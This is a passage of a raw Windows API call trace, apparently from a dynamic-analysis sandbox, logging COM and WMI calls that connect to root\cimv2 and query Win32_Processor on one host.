riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e31c | out: ppvObject=0x38e31c*=0x0) returned 0x80004002 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e328 | out: ppvObject=0x38e328*=0x0) returned 0x80004002 [0216.034] CoGetContextToken (in: pToken=0x38e388 | out: pToken=0x38e388) returned 0x0 [0216.034] CoGetContextToken (in: pToken=0x38e79c | out: pToken=0x38e79c) returned 0x0 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e81c | out: ppvObject=0x38e81c*=0x0) returned 0x80004002 [0216.034] WbemLocator:IUnknown:Release (This=0x5642740) returned 0x2 [0216.034] WbemLocator:IUnknown:Release (This=0x5642740) returned 0x1 [0216.034] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0216.034] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0216.034] WbemLocator:IUnknown:QueryInterface (in: This=0x5642740, riid=0x38ee4c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee48 | out: ppvObject=0x38ee48*=0x5642740) returned 0x0 [0216.034] WbemLocator:IUnknown:AddRef (This=0x5642740) returned 0x3 [0216.034] WbemLocator:IUnknown:Release (This=0x5642740) returned 0x2 [0216.034] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efd8 | out: puCount=0x38efd8*=0x2) returned 0x0 [0216.034] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38efd4*=0x0, pszText=0x0 | out: puBuffLength=0x38efd4*=0xf, pszText=0x0) returned 0x0 [0216.035] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38efd4*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efd4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0216.035] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38ee84 | out: ppv=0x38ee84*=0x5642750) returned 0x0 [0216.035] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642750, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef24 | out: ppNamespace=0x38ef24*=0x563f368) returned 0x0 [0216.144] WbemLocator:IUnknown:QueryInterface (in: This=0x563f368, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda8 | out: ppvObject=0x38eda8*=0x55c4f8c) returned 0x0 [0216.144] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c4f8c, pProxy=0x563f368, pAuthnSvc=0x38edf8, pAuthzSvc=0x38edf4, pServerPrincName=0x38edec, pAuthnLevel=0x38edf0, pImpLevel=0x38ede0, pAuthInfo=0x38ede4, pCapabilites=0x38ede8 | out: pAuthnSvc=0x38edf8*=0xa, pAuthzSvc=0x38edf4*=0x0, pServerPrincName=0x38edec, pAuthnLevel=0x38edf0*=0x6, pImpLevel=0x38ede0*=0x2, pAuthInfo=0x38ede4, pCapabilites=0x38ede8*=0x1) returned 0x0 [0216.144] WbemLocator:IUnknown:Release (This=0x55c4f8c) returned 0x1 [0216.144] WbemLocator:IUnknown:QueryInterface (in: This=0x563f368, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed9c | out: ppvObject=0x38ed9c*=0x55c4fac) returned 0x0 [0216.144] WbemLocator:IUnknown:QueryInterface (in: This=0x563f368, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed88 | out: ppvObject=0x38ed88*=0x55c4f8c) returned 0x0 [0216.144] WbemLocator:IClientSecurity:SetBlanket (This=0x55c4f8c, pProxy=0x563f368, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.144] WbemLocator:IUnknown:Release (This=0x55c4f8c) returned 0x2 [0216.144] WbemLocator:IUnknown:Release (This=0x55c4fac) returned 0x1 [0216.144] CoTaskMemFree (pv=0x55feb28) [0216.144] WbemLocator:IUnknown:AddRef (This=0x563f368) returned 0x2 [0216.145] WbemLocator:IUnknown:Release (This=0x5642750) returned 0x0 [0216.145] CoGetContextToken (in: pToken=0x38e2dc | out: pToken=0x38e2dc) returned 0x0 [0216.145] CoGetContextToken (in: pToken=0x38e6ec | out: pToken=0x38e6ec) returned 0x0 [0216.145] WbemLocator:IUnknown:QueryInterface (in: This=0x563f368, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e688 | out: ppvObject=0x38e688*=0x55c4f94) returned 0x0 [0216.145] WbemLocator:IRpcOptions:Query (in: This=0x55c4f94, pPrx=0x55ee498, dwProperty=2, pdwValue=0x38e77c | out: pdwValue=0x38e77c) returned 0x80004002 [0216.145] WbemLocator:IUnknown:Release (This=0x55c4f94) returned 0x2 [0216.145] CoGetContextToken (in: pToken=0x38ecbc | out: pToken=0x38ecbc) returned 0x0 [0216.145] CoGetContextToken (in: pToken=0x38ec1c | out: pToken=0x38ec1c) returned 0x0 [0216.145] WbemLocator:IUnknown:QueryInterface (in: This=0x563f368, riid=0x38ecec*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebb8 | out: ppvObject=0x38ebb8*=0x563f368) returned 0x0 [0216.146] WbemLocator:IUnknown:Release (This=0x563f368) returned 0x2 [0216.146] SysStringLen (param_1=0x0) returned 0x0 [0216.146] CoGetContextToken (in: pToken=0x38eddc | out: pToken=0x38eddc) returned 0x0 [0216.146] IWbemServices:ExecQuery (in: This=0x563f368, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x38efe4 | out: ppEnum=0x38efe4*=0x544efd0) returned 0x0 [0216.150] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee40 | out: ppvObject=0x38ee40*=0x544efd4) returned 0x0 [0216.150] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38ee90, pAuthzSvc=0x38ee8c, pServerPrincName=0x38ee84, pAuthnLevel=0x38ee88, pImpLevel=0x38ee78, pAuthInfo=0x38ee7c, pCapabilites=0x38ee80 | out: pAuthnSvc=0x38ee90*=0xa, pAuthzSvc=0x38ee8c*=0x0, pServerPrincName=0x38ee84, pAuthnLevel=0x38ee88*=0x6, pImpLevel=0x38ee78*=0x2, pAuthInfo=0x38ee7c, pCapabilites=0x38ee80*=0x1) returned 0x0 [0216.150] IUnknown:Release (This=0x544efd4) returned 0x1 [0216.150] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee34 | out: ppvObject=0x38ee34*=0x55c4bec) returned 0x0 [0216.150] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee20 | out: ppvObject=0x38ee20*=0x544efd4) returned 0x0 [0216.150] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.151] IUnknown:Release (This=0x544efd4) returned 0x2 [0216.151] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0216.151] CoTaskMemFree (pv=0x55feb58) [0216.152] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0216.152] CoGetContextToken (in: pToken=0x38e360 | out: pToken=0x38e360) returned 0x0 [0216.152] CoGetContextToken (in: pToken=0x38e774 | out: pToken=0x38e774) returned 0x0 [0216.152] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e70c | out: ppvObject=0x38e70c*=0x55c4bd4) returned 0x0 [0216.152] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x55edb50, dwProperty=2, pdwValue=0x38e800 | out: pdwValue=0x38e800) returned 0x80004002 [0216.152] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0216.152] CoGetContextToken (in: pToken=0x38ed44 | out: pToken=0x38ed44) returned 0x0 [0216.153] CoGetContextToken (in: pToken=0x38eca4 | out: pToken=0x38eca4) returned 0x0 [0216.153] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ed74*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec40 | out: ppvObject=0x38ec40*=0x544efd0) returned 0x0 [0216.153] IUnknown:Release (This=0x544efd0) returned 0x2 [0216.153] SysStringLen (param_1=0x0) returned 0x0 [0216.153] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f030 | out: puCount=0x38f030*=0x2) returned 0x0 [0216.153] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f02c*=0x0, pszText=0x0 | out: puBuffLength=0x38f02c*=0xf, pszText=0x0) returned 0x0 [0216.153] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f02c*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f02c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0216.153] CoGetContextToken (in: pToken=0x38ee84 | out: pToken=0x38ee84) returned 0x0 [0216.153] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f03c | out: ppEnum=0x38f03c*=0x544f098) returned 0x0 [0216.154] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eef8 | out: ppvObject=0x38eef8*=0x544f09c) returned 0x0 [0216.154] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef48, pAuthzSvc=0x38ef44, pServerPrincName=0x38ef3c, pAuthnLevel=0x38ef40, pImpLevel=0x38ef30, pAuthInfo=0x38ef34, pCapabilites=0x38ef38 | out: pAuthnSvc=0x38ef48*=0xa, pAuthzSvc=0x38ef44*=0x0, pServerPrincName=0x38ef3c, pAuthnLevel=0x38ef40*=0x6, pImpLevel=0x38ef30*=0x2, pAuthInfo=0x38ef34, pCapabilites=0x38ef38*=0x1) returned 0x0 [0216.154] IUnknown:Release (This=0x544f09c) returned 0x1 [0216.155] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eeec | out: ppvObject=0x38eeec*=0x55c518c) returned 0x0 [0216.155] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eed8 | out: ppvObject=0x38eed8*=0x544f09c) returned 0x0 [0216.155] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.198] IUnknown:Release (This=0x544f09c) returned 0x2 [0216.198] WbemLocator:IUnknown:Release (This=0x55c518c) returned 0x1 [0216.198] CoTaskMemFree (pv=0x55feb88) [0216.199] IUnknown:AddRef (This=0x544f098) returned 0x2 [0216.199] CoGetContextToken (in: pToken=0x38e408 | out: pToken=0x38e408) returned 0x0 [0216.199] CoGetContextToken (in: pToken=0x38e81c | out: pToken=0x38e81c) returned 0x0 [0216.199] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7b4 | out: ppvObject=0x38e7b4*=0x55c5174) returned 0x0 [0216.199] WbemLocator:IRpcOptions:Query (in: This=0x55c5174, pPrx=0x55ee450, dwProperty=2, pdwValue=0x38e8a8 | out: pdwValue=0x38e8a8) returned 0x80004002 [0216.199] WbemLocator:IUnknown:Release (This=0x55c5174) returned 0x2 [0216.200] CoGetContextToken (in: pToken=0x38edec | out: pToken=0x38edec) returned 0x0 [0216.200] CoGetContextToken (in: pToken=0x38ed4c | out: pToken=0x38ed4c) returned 0x0 [0216.200] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee1c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ece8 | out: ppvObject=0x38ece8*=0x544f098) returned 0x0 [0216.200] IUnknown:Release (This=0x544f098) returned 0x2 [0216.200] SysStringLen (param_1=0x0) returned 0x0 [0216.200] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0216.250] CoTaskMemAlloc (cb=0x4) returned 0x56427c0 [0216.250] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56427c0, puReturned=0x26b0ca8 | out: apObjects=0x56427c0*=0x56375f8, puReturned=0x26b0ca8*=0x1) returned 0x0 [0230.946] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e694 | out: ppvObject=0x38e694*=0x56375f8) returned 0x0 [0230.947] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e648 | out: ppvObject=0x38e648*=0x0) returned 0x80004002 [0230.947] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e470 | out: ppvObject=0x38e470*=0x0) returned 0x80004002 [0230.947] IUnknown:AddRef (This=0x56375f8) returned 0x3 [0230.947] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38dfa4 | out: ppvObject=0x38dfa4*=0x0) returned 0x80004002 [0230.947] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38df54 | out: ppvObject=0x38df54*=0x0) returned 0x80004002 [0230.947] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38df60 | out: ppvObject=0x38df60*=0x56375fc) returned 0x0 [0230.948] IMarshal:GetUnmarshalClass (in: This=0x56375fc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df68 | out: pCid=0x38df68*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0230.948] IUnknown:Release (This=0x56375fc) returned 0x3 [0230.948] CoGetContextToken (in: pToken=0x38dfc0 | out: pToken=0x38dfc0) returned 0x0 [0230.948] CoGetContextToken (in: pToken=0x38e3d4 | out: pToken=0x38e3d4) returned 0x0 [0230.948] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e454 | out: ppvObject=0x38e454*=0x0) returned 0x80004002 [0230.948] IUnknown:Release (This=0x56375f8) returned 0x2 [0230.948] CoGetContextToken (in: pToken=0x38e9bc | out: pToken=0x38e9bc) returned 0x0 [0230.948] CoGetContextToken (in: pToken=0x38e91c | out: pToken=0x38e91c) returned 0x0 [0230.948] IUnknown:QueryInterface (in: This=0x56375f8, riid=0x38e9ec*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e9e8 | out: ppvObject=0x38e9e8*=0x56375f8) returned 0x0 [0230.948] IUnknown:AddRef (This=0x56375f8) returned 0x4 [0230.948] IUnknown:Release (This=0x56375f8) returned 0x3 [0230.948] IUnknown:Release (This=0x56375f8) returned 0x2 [0230.949] CoTaskMemFree (pv=0x56427c0) [0230.949] CoGetContextToken (in: pToken=0x38ed2c | out: pToken=0x38ed2c) returned 0x0 [0230.949] IUnknown:AddRef (This=0x56375f8) returned 0x3 [0230.949] IWbemClassObject:Get (in: This=0x56375f8, wszName="__GENUS", lFlags=0, pVal=0x38f02c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f0ac*=0, plFlavor=0x38f0a8*=0 | out: pVal=0x38f02c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f0ac*=3, plFlavor=0x38f0a8*=64) returned 0x0 [0230.950] IWbemClassObject:Get (in: This=0x56375f8, wszName="__PATH", lFlags=0, pVal=0x38f010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f094*=0, plFlavor=0x38f090*=0 | out: pVal=0x38f010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x38f094*=8, plFlavor=0x38f090*=64) returned 0x0 [0230.950] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6e [0230.950] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6e [0230.951] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f03c | out: ppv=0x38f03c*=0x6d0cac) returned 0x0 [0230.951] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f034 | out: pAptType=0x38f034*=1) returned 0x0 [0230.951] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f038 | out: ppvObject=0x38f038*=0x0) returned 0x80004002 [0230.951] IUnknown:Release (This=0x6d0cac) returned 0x1 [0230.954] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9a8 | out: ppv=0x38e9a8*=0x56427c0) returned 0x0 [0230.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x56427c0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ebc0 | out: ppvObject=0x38ebc0*=0x0) returned 0x80004002 [0230.955] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56427c0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ebcc | out: ppvObject=0x38ebcc*=0x56441b8) returned 0x0 [0230.955] WbemDefPath:IUnknown:Release (This=0x56427c0) returned 0x0 [0230.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7ec | out: ppvObject=0x38e7ec*=0x56441b8) returned 0x0 [0230.955] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7a0 | out: ppvObject=0x38e7a0*=0x0) returned 0x80004002 [0230.956] WbemDefPath:IUnknown:AddRef (This=0x56441b8) returned 0x3 [0230.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e0fc | out: ppvObject=0x38e0fc*=0x0) returned 0x80004002 [0230.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0ac | out: ppvObject=0x38e0ac*=0x0) returned 0x80004002 [0230.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e0b8 | out: ppvObject=0x38e0b8*=0x56427d0) returned 0x0 [0230.956] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56427d0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e0c0 | out: pCid=0x38e0c0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0230.956] WbemDefPath:IUnknown:Release (This=0x56427d0) returned 0x3 [0230.956] CoGetContextToken (in: pToken=0x38e118 | out: pToken=0x38e118) returned 0x0 [0230.956] CoGetContextToken (in: pToken=0x38e52c | out: pToken=0x38e52c) returned 0x0 [0230.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5ac | out: ppvObject=0x38e5ac*=0x0) returned 0x80004002 [0230.956] WbemDefPath:IUnknown:Release (This=0x56441b8) returned 0x2 [0230.956] WbemDefPath:IUnknown:Release (This=0x56441b8) returned 0x1 [0230.956] CoGetContextToken (in: pToken=0x38eebc | out: pToken=0x38eebc) returned 0x0 [0230.956] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0230.956] WbemDefPath:IUnknown:QueryInterface (in: This=0x56441b8, riid=0x38eeec*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38eee8 | out: ppvObject=0x38eee8*=0x56441b8) returned 0x0 [0230.956] WbemDefPath:IUnknown:AddRef (This=0x56441b8) returned 0x3 [0230.956] WbemDefPath:IUnknown:Release (This=0x56441b8) returned 0x2 [0230.957] WbemDefPath:IWbemPath:SetText (This=0x56441b8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f068 | out: puCount=0x38f068*=0x2) returned 0x0 [0230.957] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f064*=0x0, pszText=0x0 | out: 